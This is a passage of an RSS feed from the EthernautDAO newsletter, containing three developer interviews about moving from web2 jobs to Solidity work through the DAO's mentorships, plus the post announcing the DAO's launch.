            <description><![CDATA[A place where developers tell their stories of how they became part of web3. Donate and get one of these NTFs!Our NFTs are ready for your donation!https://mint.ethernautdao.io/What did you do before getting into web3?For the past 5 years, I was working in a web 2.0 company as a technology lead & PM. Before that, I had my own startup and worked on games.What were the first things you did in web3?For me, it started with learning about smart contracts. CryptoZombies was my first hands-on experie...]]></description>
            <content:encoded><![CDATA[<p><strong>A place where developers tell their stories of how they became part of web3.</strong></p><p>Donate and get one of these NTFs!</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/286aee9a4467dcb65025291817395082984c507a39ec05dffaee3885ce57603e.png" alt="Our NFTs are ready for your donation!" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Our NFTs are ready for your donation!</figcaption></figure><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://mint.ethernautdao.io/">https://mint.ethernautdao.io/</a></p><h2 id="h-what-did-you-do-before-getting-into-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What did you do before getting into web3?</h2><p>For the past 5 years, I was working in a web 2.0 company as a technology lead &amp; PM. Before that, I had my own startup and worked on games.</p><h2 id="h-what-were-the-first-things-you-did-in-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What were the first things you did in web3?</h2><p>For me, it started with learning about smart contracts. CryptoZombies was my first hands-on experience. After this, I participated in the ETHGlobal Web3 Weekend hackathon. The first experience was really amazing, <strong>the way the community extended itself to help out a newbie like me was really amazing.</strong> After that there was no turning back, I participated in multiple hackathons, contributed to a couple of projects, and finally landed a <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/yield">Yield</a> mentorship through EthernautDAO.</p><h2 id="h-when-and-how-did-you-start-to-think-about-quitting-your-web2-job" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">When and how did you start to think about quitting your web2 job?</h2><p>Once I got to understand more about web3 and the new possibilities that it opens up I started looking out for how to make a leap into this industry. I believe that <strong>web3 has opened up a new way of coordination</strong> that would enable a lot of things that were not possible before. The industry is going through a monetization phase because of which I wanted to work on something that would eventually become a building block for the industry.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/3f5a121615714d015c7db2f33fb59f1e6e13d231758001beafb6fbb6f145cce7.gif" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h2 id="h-how-did-you-hear-about-ethernautdao" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you hear about EthernautDAO?</h2><p>I got to learn about EthernautDAO through my brother. He knew that I was looking to make a leap and pointed me to the tweet.</p><h2 id="h-have-you-applied-for-a-mentorship-how-did-it-feel" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Have you applied for a mentorship? How did it feel?</h2><p>I did apply for the mentorship with <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/alcueca">Alberto</a>. It was tough summarising my work-life till now &amp; make a strong case. Seeing the other candidates I didn’t expect to get through. So, I started applying for other mentorship options as well. I did hope to get in with Alberto as I had seen the work he had done &amp; it made me want to work with him.</p><h2 id="h-did-you-work-and-get-mentored-at-the-same-time" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Did you work and get mentored at the same time?</h2><p>I was working full-time in my last role while getting mentored. It was challenging in the beginning as I had to change my mindset. I was coding for a long time and earlier I used to focus more on getting the job done and not necessarily on the aesthetics of the code. Thankfully Alberto was really patient and got me through it.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/deee7c8604c31b4ae18ba49b71742c0d390244d5b98befd5ee4c1e07274feea6.gif" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h2 id="h-if-you-have-transitioned-to-web3-full-time-how-different-is-it-from-your-previous-career" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">If you have transitioned to web3 full time, how different is it from your previous career?</h2><p>There is a huge difference. As a smart contract developer, you have to be responsible for the development, testing &amp; deployment. <strong>Inefficient smart contract code literally costs money</strong>. So you have to be meticulous about each line you write. It’s really adversarial once a smart contract is deployed so <strong>you have to always think about how the code could be exploited</strong> by malicious actors which was not always the case in my previous role. I am also really excited about what we are trying to build as an industry. What we are building might end up being the foundation on which economies might end up running. Apart from this, I would say <strong>I am really happy about the people I get to work with within this industry</strong>. They are not only helpful &amp; encouraging but always push the bar of quality &amp; output.</p><h2 id="h-what-advice-would-you-give-to-web3-curious-devs" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What advice would you give to web3-curious devs?</h2><p>Get your hands dirty as quickly as possible. Try to do a complete cycle of development, testing &amp; deployment at least once to get a taste of what it is going to look like. Testing might feel tedious in the beginning however, you will sleep well when you have a thoroughly tested smart contract. Participate in hackathons to get yourself familiar with the things being built out there.</p><p>And special thanks to Ethernauts as well for starting EthernautDAO, I would be eternally grateful for this.</p><p><em>EthernautDAO offers free mentorships to experienced web2 devs trying to break into web3. If this sounds like you, check out the available mentorships in the EthernautDAO </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3"><em>Discord</em></a><em> and follow us on </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO"><em>Twitter</em></a><em> to get notified when a new mentorship is available.</em></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Ethernaut Wei series presents: Bayological]]></title>
            <link>https://paragraph.com/@ethernautdao/ethernaut-wei-series-presents-bayological</link>
            <guid>KBMCWLn6pmRsH4GbTxtS</guid>
            <pubDate>Fri, 06 May 2022 14:14:46 GMT</pubDate>
            <description><![CDATA[A place where developers tell their stories of how they became part of web3.Donate and get one of these NTFs!https://mint.ethernautdao.io/What did you do before getting into web3?Before getting into web3, I worked as a full-stack developer for over 10 years. I built web apps and backend services for large corporations. Standard web2 stuff.What were the first things you did in web3?One of the first things I did in web3 was work on a limit order app at the beginning of 2021. A good friend of mi...]]></description>
            <content:encoded><![CDATA[<p><strong>A place where developers tell their stories of how they became part of web3.</strong></p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/742756a81a37a89871c303d3fbcc481b797c6ac9122be0626a911ee2965dbc7c.png" alt="Donate and get one of these NTFs!" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Donate and get one of these NTFs!</figcaption></figure><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://mint.ethernautdao.io/">https://mint.ethernautdao.io/</a></p><h2 id="h-what-did-you-do-before-getting-into-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What did you do before getting into web3?</h2><p>Before getting into web3, I worked as a full-stack developer for over 10 years. I built web apps and backend services for large corporations. Standard web2 stuff.</p><h2 id="h-what-were-the-first-things-you-did-in-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What were the first things you did in web3?</h2><p>One of the first things I did in web3 was work on a limit order app at the beginning of 2021. A good friend of mine, who was already in web3, introduced me to the team he was working with as they were looking for devs to help. The app was a good learning experience for me as the work was full-stack, so I got a lot of exposure to new concepts and tools. It also showed me how much I needed to learn and how deep the web3 rabbit hole went.</p><h2 id="h-when-and-how-did-you-start-to-think-about-quitting-your-web2-job" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">When and how did you start to think about quitting your web2 job?</h2><p>I had lost interest in the work I was doing &amp; working in a corporate environment, so I was already thinking about quitting. What really pushed me to leave was the book Mastering Ethereum. The book did an excellent job of explaining fundamental concepts and chapter 1 actually got me excited about software development again. After reading it, I felt obliged to get skilled and join the devs that were building on Ethereum. I couldn’t even imagine staying in my web2 job any longer.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/c434796667f22ba34813bf4c7e690fdf130003df64b39b91efde4580214964b8.gif" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h2 id="h-how-did-you-hear-about-ethernautdao" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you hear about EthernautDAO?</h2><p>I saw the tweet from <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/the_ethernaut">Ale</a> calling for experienced devs looking to make the jump. I DM’d him straight away then he sent me the link to join the discord shortly after.</p><h2 id="h-have-you-applied-for-a-mentorship-how-did-it-feel" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Have you applied for a mentorship? How did it feel?</h2><p>After joining the discord, I applied for two mentorships and got picked for one. I honestly didn’t think I would’ve been chosen as I didn’t have much experience, and so many other devs were applying.</p><h2 id="h-did-you-work-and-get-mentored-at-the-same-time" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Did you work and get mentored at the same time?</h2><p>I was still working full-time when the mentorship started. I spent my days working my web2 job and my evenings doing the work for the mentorship whilst studying. It was definitely challenging, but I was motivated to leave my web2 job and transition to web3 development. This really gave me the energy to persist.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/82814e403847ca418cca7ecb406eda5847cf9a02d760b1c57209be3bf5b9ec62.gif" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h2 id="h-if-you-have-transitioned-to-web3-full-time-how-different-is-it-from-your-previous-career" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">If you have transitioned to web3 full time, how different is it from your previous career?</h2><p>Working in web3 is entirely different from my previous career. A significant difference I’ve seen is the enthusiasm for what we’re building. Most of the people I work with now are genuinely interested in what we’re building and the team’s overall vision. This makes a huge difference in the team morale and the quality of work produced. I rarely felt this with teams I had worked with before.</p><h2 id="h-what-made-you-decide-to-become-a-mentor" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What made you decide to become a mentor?</h2><p><strong>I feel like I learned a lot from the resources and other devs in the EthernautDAO, so I became a mentor because I wanted to give something back.</strong> There are a lot of good experienced web2 developers there looking for mentorship and guidance on their journey into web3, but nowhere near enough mentors available to help them. I was in this position recently, so I know what it was like. I’m not an OG, but I have learned enough to support and guide other devs starting their journey.</p><h2 id="h-what-advice-would-you-give-to-web3-curious-devs" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What advice would you give to web3-curious devs?</h2><p>First, <strong>join the EthernautDAO</strong>. It’s an excellent gateway to web3 development. You’ll find valuable resources and helpful people who can assist you on your journey. Second, <strong>never stop learning</strong>. One of the most important things a developer can do is build a continuous learning mindset. This is even more important in web3 development with the constant innovations and relentless hacks. Figure out the path you want to go down, then identify what you need to learn for the journey and try to create yourself a study guide. Third, <strong>ABC</strong> (<strong>always be coding</strong>). The more code you write, the better you’ll get at it (hopefully 😅). Get familiar with the language and libraries you’ll use by regularly practicing. Get comfortable reading code, check out the repositories of your favorite projects and see how they work under the hood.</p><p>Follow Bayological on Twitter: <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/bayological">@bayological</a></p><p><em>EthernautDAO offers free mentorships to experienced web2 devs trying to break into web3. If this sounds like you, check out the available mentorships in the EthernautDAO </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3"><em>Discord</em></a><em> and follow us on </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO"><em>Twitter</em></a><em> to get notified when a new mentorship is available.</em></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Ethernaut Wei series presents: devtooligan]]></title>
            <link>https://paragraph.com/@ethernautdao/ethernaut-wei-series-presents-devtooligan</link>
            <guid>U5E0Qjdmxu5SEplOtZWB</guid>
            <pubDate>Fri, 06 May 2022 12:47:04 GMT</pubDate>
            <description><![CDATA[A place where developers tell their stories of how they became part of web3.Donate and get one of this NTFs!https://mint.ethernautdao.io/What did you do before getting into web3?I was a full stack web2 developer (React/Django) for over 5 years. Before that, I had various non-dev roles in FinTech, and before that, I was a TradFi analyst.What were the first things you did in web3?I did a hackathon in 2016. I only worked on the front end, but it was cool and my first intro to the web3 community....]]></description>
            <content:encoded><![CDATA[<p><strong>A place where developers tell their stories of how they became part of web3.</strong></p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/753c6bde7f92fcf6f413791473a6a15a148c9c0ddda2932b0ccc040bd910f75a.png" alt="Donate and get one of this NTFs!" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Donate and get one of this NTFs!</figcaption></figure><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://mint.ethernautdao.io/">https://mint.ethernautdao.io/</a></p><h2 id="h-what-did-you-do-before-getting-into-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What did you do before getting into web3?</h2><p>I was a full stack web2 developer (React/Django) for over 5 years. Before that, I had various non-dev roles in FinTech, and before that, I was a TradFi analyst.</p><h2 id="h-what-were-the-first-things-you-did-in-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What were the first things you did in web3?</h2><p>I did a hackathon in 2016. <strong>I only worked on the front end, but it was cool and my first intro to the web3 community</strong>. Around that time I also worked through CryptoZombies. I didn’t do much with web3 for the next 3–4 years because I was focused on leveling up in my web2 job. Then around the beginning of 2021, I started doing some web3 tutorials again.</p><h2 id="h-when-and-how-did-you-start-to-think-about-quitting-your-web2-job" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">When and how did you start to think about quitting your web2 job?</h2><p>It was August 2021, and I was so burnt out on my web2 job. **I knew I wanted a switch but I didn’t think I could get a job in web3 **because I did not have the requisite skills. I was interviewing for other web2 jobs but my heart wasn’t in it.</p><h2 id="h-how-did-you-hear-about-ethernautdao" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you hear about EthernautDAO?</h2><p>I saw this:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/the_ethernaut/status/1411817693959831553?s=20&amp;t=evlsfvhm0aB7mVFRxSoSXQ">https://twitter.com/the_ethernaut/status/1411817693959831553?s=20&amp;t=evlsfvhm0aB7mVFRxSoSXQ</a></p><p>and responded to it. I dm’d him and he directed me to EthernautDAO discord.</p><h2 id="h-have-you-applied-for-a-mentorship-how-did-it-feel" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Have you applied for a mentorship? How did it feel?</h2><p><strong>I was intimidated by all the other candidates applying for the </strong><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/yield"><strong>Yield</strong></a> mentorship. I felt I was one of the weakest. I tried really hard to make my 1 paragraph description look good and stand out from the rest, emphasizing my non-web3 strengths. I was a little surprised I was chosen for an interview, but even more nervous. <strong>How was I going to master Solidity within 1 week before my interview?</strong> Fast forward a week and I hadn’t even looked at Solidity once.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/fca63f91b83737640891eb7b528305beacf6e34c9d2528a41ab9dc4c67e08701.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>My interview was at 8:30 am and there was an all-hands emergency at my current job that just happened. I was getting over a nasty cold and feeling stressed and miserable. <strong>At 8:25 am I decided I would not interview.</strong> I was sure they wouldn’t choose me because my web3 skills were so poor. I didn’t want to waste my time. <strong>At 8:29 am I changed my mind</strong> and decided to go through with it. I remember taking a deep breath and thinking to myself, “Just give it your best shot, that’s all you can do.” That decision changed my life.</p><h2 id="h-did-you-work-and-get-mentored-at-the-same-time" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Did you work and get mentored at the same time?</h2><p>Yes. It was difficult at times. Especially considering I was starting off well behind my two cohort mates in the mentorship. So I had to work much harder to level up my skills. But everyone was really cool and helpful. Our mentor, <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/alcueca">Alberto</a>, is extremely kind and patient. He is also a masterful teacher, a world-class programmer, and an all-around great guy. <strong>A big source of motivation for me was that I did not want to let him down.</strong></p><h2 id="h-if-you-have-transitioned-to-web3-full-time-how-different-is-it-from-your-previous-career" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">If you have transitioned to web3 full time, how different is it from your previous career?</h2><p>Night and FUCKING day.</p><p>My web2 job experience: 20–30% of my time wasted in useless meetings. <strong>“Agile” web2 product dev means they are quick to pull you off of any project you are in the middle of because a key client wants some ridiculous new tweak</strong>. Other devs seemed to be happy implementing half-assed bandaid solutions. I guess it means they will still have a job when it breaks in 6 months. No quality standards whatsoever. Poorly documented, barely functioning, spaghetti code is the norm. My mental and physical health were deteriorating — a lot of the stress was from feeling like I was wasting my life.</p><p>My web3 experience: I’m constantly amazed at <strong>the caliber of people I get to work with</strong>. We challenge each other to find new ways to raise the bar. Quality standards are quite high. I guess it’s different when you’ve got full mutability and unlimited resources in web2, meanwhile <strong>we’re out here trying to build </strong><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://jacob.energy/hyperstructures.html"><strong>hyperstructures</strong></a> <strong>that run on the EVM.</strong> If we don’t go lean we’re too expensive, and if we’re not ultra-secure, we get hacked. Because the stakes are higher, naturally, the quality of the code, the culture, the people, and the integrity all go up.** Devs are respected and appreciated**. I am given 1–2 days per week to basically work on anything I want. I love every minute of my job, I’m excited to log on in the mornings and interact with my colleagues.</p><h2 id="h-what-advice-would-you-give-to-web3-curious-devs" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What advice would you give to web3-curious devs?</h2><p><strong>Follow your heart</strong>. Don’t let fear dictate your life. Go down some rabbit holes reading/learning about things. Buidl something. You might think AMM’s are crazy complex, but if you sat down and did a tutorial, I bet you could build one in ½ a day. The same thing with NFTs, you could literally mint your own NFTs within a couple of hours following a tutorial. Find good communities on Twitter or Discord, there are plenty. Or don’t!! <strong>Just don’t waste your life and health on a stressful, soul-deteriorating job cuz life is too goddamn shawt</strong>.</p><h2 id="h-anything-else-you-want-to-add" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Anything else you want to add?</h2><p>I am eternally grateful to EthernautDAO. It has been life-changing for me. I fully support everything you are doing. Thank you from the bottom of my heart. I will continue to give back to the DAO as well as the web3 community for the rest of my life, inspired by you. Thank you.</p><p>Follow devtooligan on Twitter: <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/devtooligan">@devtooligan</a></p><p><em>EthernautDAO offers free mentorships to experienced web2 devs trying to break into web3. If this sounds like you, check out the available mentorships in the EthernautDAO </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3"><em>Discord</em></a><em> and follow us on </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO"><em>Twitter</em></a><em> to get notified when a new mentorship is available.</em></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Introducing the EthernautDAO]]></title>
            <link>https://paragraph.com/@ethernautdao/introducing-the-ethernautdao</link>
            <guid>E8hGAz6VDGB6jW7ZZDgP</guid>
            <pubDate>Thu, 05 May 2022 16:54:40 GMT</pubDate>
            <description><![CDATA[Become an Ethernaut and help build the next generation of Ethereum developers.Welcome to the Ether, Ethernaut.The Ethereum ecosystem continues to grow at a staggering pace. Layer 2 solutions are finally here, the Eth2 merge is well under way, and DeFi adoption continues to rise. Things are stirring up for sure! To keep up with the pace, protocols need to scale engineering capacities. In spite of the phenomenal growth, there aren’t enough qualified developers in the ecosystem for everything we...]]></description>
            <content:encoded><![CDATA[<p><strong>Become an Ethernaut and help build the next generation of Ethereum developers.</strong></p><h1 id="h-welcome-to-the-ether-ethernaut" class="text-4xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Welcome to the Ether, Ethernaut.</h1><p>The Ethereum ecosystem continues to grow at a staggering pace. Layer 2 solutions are finally here, the Eth2 merge is well under way, and DeFi adoption continues to rise. Things are stirring up for sure! To keep up with the pace, protocols need to scale engineering capacities. In spite of the phenomenal growth, there aren’t enough qualified developers in the ecosystem for everything we need to build in the short to mid term. The issue at hand is that while there are millions of exceptionally skilled and experienced senior developers out there, senior <em>Solidity</em> developers remain scarce.</p><p>The Ethernauts, developers already exploring the ether, seek out to solve this imbalance and flip the supply deficiency by combining their forces and knowledge. With the right incentives, we can rapidly transform senior developers into senior Solidity developers.</p><p>Therefore, we are thrilled to share with you the news of the creation of the <strong>EthernautDAO</strong>.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/df82a4804cfd839fc991f5819c2bf494214b739d924b39057f31cc8cdf592c03.jpg" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h1 id="h-the-ethernaut-solution" class="text-4xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">The Ethernaut solution</h1><p>Fortunately, the first Ethernauts are starting to come together to train new <em>Ethereum engineers</em>! To jump-start the population of future Ethernauts, we can begin with just the <em>Ethereum</em> part. With the right mentoring, a senior developer can become a senior <em>Solidity</em> developer in a very short period of time.</p><p>A senior developer in any tech stack is a master of the art of divide-and-conquer problem solving. In fact, this is one of the pillars that gives the seniority title. For a senior developer, learning a new language, or even a new tech stack like Ethereum is just another problem that can be crushed systematically. With a skilled mentor — a fellow Ethernaut — at hand, this can be accomplished in no time.</p><p>The genesis group of Ethernauts consists of meticulously picked, highly skilled and experienced Solidity developers and educators chosen by the founding protocols of the DAO. Mentors in turn propose their trainees, while the EthernautDAO will provide incentives to jump-start a rapid two-month mentoring program.</p><p>Throughout the program, trainees can already be productive by helping out with the outer layers of a particular project, which do not strictly require Ethereum knowledge per se. Things like front end engineering, unit testing, continuous integration, scripting, and much more; in our experience, we’ve found that backlog trimming is a particularly effective training ground for Ethernauts-to-be.</p><p>Our initial calculations show that if training takes 2 months, we could turn the entire population of senior developers worldwide into Ethernauts in less than four years. Or maybe not. 😆</p><p>At the end of the transformation process, new Ethernauts will arise who in return one day will be able to mentor new trainees. The more Ethernauts we create, the faster we can scale our efforts building the future of Ethereum.</p><h1 id="h-shaping-the-future-of-ethereum" class="text-4xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Shaping the future of Ethereum</h1><p>This two-month mentoring program is just the beginning. As the EthernautDAO aligns incentives, it will act as a valuable resource for trainees, mentors, and protocols looking for Solidity developers. The DAO will be able to define standards with regard to educational material and instructional content, skill assessment, and hiring conditions. For example, the DAO will guarantee a minimum wage, fair equity emission, 100% remote compatibility, and more.</p><p>Besides mentoring senior developers, the EthernautDAO will also enable non-seniors to participate in open activities, such as workshops, AMAs or hackathons. The first <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3">Discord</a> AMA is already planned for Wednesday, July 14th 21:00 UTC. Don’t miss this opportunity to get involved with the EthernautDAO!</p><p>With time, we can expect the DAO to produce its own curriculum to educate future Ethereum developers and be a well known go-to place for general education. This way, also junior or semi-senior developers will be able to benefit from the DAO and one day have a trajectory at hand to become successful Ethernauts, adding to the ever growing pool of qualified Ethereum builders.</p><p>And this is just the beginning. How the EthernautDAO evolves in order to define new standards and enable growth depends on all of us! We hereby invite the whole Ethereum community to join us and create something beautiful for all to benefit.</p><h1 id="h-ethernauts-unite" class="text-4xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Ethernauts, Unite!</h1><p>The EthernautDAO is open for everyone willing to contribute by sharing their knowledge and know-how, or to simply broaden their horizons and learn together with the best!</p><p>We also invite all Ethereum native protocols to stop fighting this battle solo, and instead collaborate to solve this problem at a community level.</p><p>The DAO at this moment consists of a council of mentors, representatives of the first participating protocols, as well as the coordination and educational staff. If you’re a senior Solidity developer or representative of a protocol, reach out to us and join the effort!</p><p><strong>For information sharing and community discussions, join our </strong><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="http://discord.gg/RQ5WYDxUF3"><strong>Discord server</strong></a><strong>, present yourself and join the discussions!</strong></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3e3f962f93b1da89a05fe16b86e0c7521eb8dd00b82219bf56c05b01f84366b1.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>